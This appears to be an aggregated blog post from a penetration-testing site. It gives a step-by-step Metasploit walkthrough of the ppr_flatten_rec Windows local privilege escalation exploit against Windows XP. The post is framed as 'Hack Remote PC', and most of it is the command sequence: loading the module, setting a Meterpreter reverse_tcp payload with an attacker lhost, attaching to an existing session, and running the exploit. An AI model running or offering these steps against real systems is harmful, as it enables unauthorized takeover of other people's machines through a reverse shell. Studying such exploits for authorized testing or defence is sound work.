Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

$
0
0

This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.

Exploit Targets

Windows XP SP 3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open Kali Linux terminal type msfconsole

Now type use use exploit/windows/local/ppr_flatten_rec

msf exploit (ppr_flatten_rec)>set payload windows/meterpreter/reverse_tcp

msf exploit (ppr_flatten_rec)>set lhost 192.168.1.103 (IP of Local Host)

msf exploit (ppr_flatten_rec)>set session 1

msf exploit (ppr_flatten_rec)>exploit

The post Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>